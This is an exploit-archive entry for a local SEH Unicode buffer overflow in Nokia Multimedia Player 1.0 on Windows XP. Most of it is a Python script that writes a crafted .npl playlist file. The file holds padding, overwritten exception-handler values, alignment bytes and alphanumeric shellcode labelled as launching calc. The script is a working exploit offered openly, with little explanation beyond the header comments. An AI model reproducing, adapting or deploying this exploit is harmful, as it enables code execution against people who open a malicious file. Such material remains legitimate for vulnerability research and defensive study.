Nokia Multimedia Player 1.0 SEH Unicode Exploit

2011-01-12T00:00:00
ID 1337DAY-ID-15157
Type zdt
Reporter n/a
Modified 2011-01-12T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            # Exploit Title: Nokia Multimedia player  SEH Unicode
# Date: January 11 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://www.brothersoft.com/nokia-multimedia-player-download-46238.html
# Version: 1.00.55.5010
# Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8
 
  
#  mail----> shogilord^gmail.com spams are welcome!!!!!
#    ________  _    _________   ____ __ _____   ________
#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __
# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/ 
  
# COLOMBIA hacking presents.............
#    
# Dont be afraid of unicode my young padawan
#
# Big Thanks to sud0 !!
#
 
junk="\x44" * 2660
 
shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBdK8lPU4KjLS8o0mPO0LoQXc3QQPlpcdMa5YhnpVXgWRs920wkOXPA" #calc shellcode
 
nseh="\x61\xC5"
 
align = "\x61\x6D\x61\x6D\x50\x6E\xC3"
 
 
seh="\xEF\x42"
 
junk2="\xcc"*45
 
junk3="\xcc"*850
 
buff=junk+nseh+seh+align+junk2+shellcode+junk3
 
magic = open("Crash1234.npl","w")
 
magic.write(buff)
 
magic.close()



#  0day.today [2018-02-16]  #